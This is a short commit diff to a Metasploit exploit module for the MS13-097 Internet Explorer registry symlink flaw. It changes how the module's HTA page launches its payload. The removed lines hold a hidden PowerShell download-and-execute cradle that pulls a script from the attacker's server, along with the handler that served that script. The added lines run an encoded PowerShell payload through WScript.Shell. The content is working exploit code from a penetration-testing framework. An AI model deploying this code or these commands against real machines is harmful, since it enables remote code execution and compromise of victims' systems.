Use cmd_psh_payload

Author: jvazquez-r7

modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb

@@ -98,20 +98,14 @@ def primer
   def on_request_uri(cli, request)
     if request.uri =~ /\.hta$/
       print_status("Sending hta...")
-      download_and_run = "IEX ((new-object net.webclient).downloadstring('#{get_uri}/#{rand_text_alpha(4 + rand(4))}.psh'))"
-      command = "powershell.exe -w hidden -nop -c #{download_and_run}"
       hta = <<-eos
 <script>
-var command = "cmd.exe /c #{command}";
+var command = "#{cmd_psh_payload(payload.encoded).strip}";
 var shell = new ActiveXObject("WScript.Shell");
 shell.Run(command);
 </script>
       eos
       send_response(cli, hta, {'Content-Type'=>'application/hta'})
-    elsif request.uri =~ /\.psh$/
-      print_status("Sending psh payload...")
-      data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
-      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
     elsif request.uri =~ /\.html$/
       print_status("Sending window close html...")
       close_html = <<-eos